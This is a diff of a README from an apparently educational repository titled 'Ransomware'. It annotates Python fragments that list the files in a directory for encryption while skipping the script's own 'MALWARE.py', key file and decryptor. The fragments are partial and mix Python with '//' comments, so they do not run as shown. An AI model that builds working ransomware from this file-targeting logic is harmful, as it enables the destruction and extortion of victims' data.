AdrianAgulto/Ransomware/README.md

 if os.path.isfile(file) // if object is a file add to encryption list

+if file == "MALWARE.py" or file == "thekey.key" or file == "DECRYPT.py": //

+continue // this tells the script to continue to the next if statement and skip the current iteration.

-if file == "MALWARE.py" or file == "thekey.key" or file == "DECRYPT.py" : (next line)continue(next line) files.append(file) // This is seperating our script files that are in the same directory from the file list we created earlier in the script.
+files.append(file) // This is seperating our python script files and key that are in the same directory from the file list we created earlier in the script.

 print(files) // Will display the "files" list in the terminal.